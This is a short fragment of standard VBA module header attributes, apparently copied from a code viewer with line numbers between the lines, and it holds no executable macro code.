
          Attribute VB_GlobalNameSpace = False

          12

          Attribute VB_Creatable = False

          13

          Attribute VB_PredeclaredId = True

          14

          Attribute VB_Exposed = True

          15

          Attribute VB_TemplateDerived = False

          16

          Attribute VB_Customizable = True

          Reset < >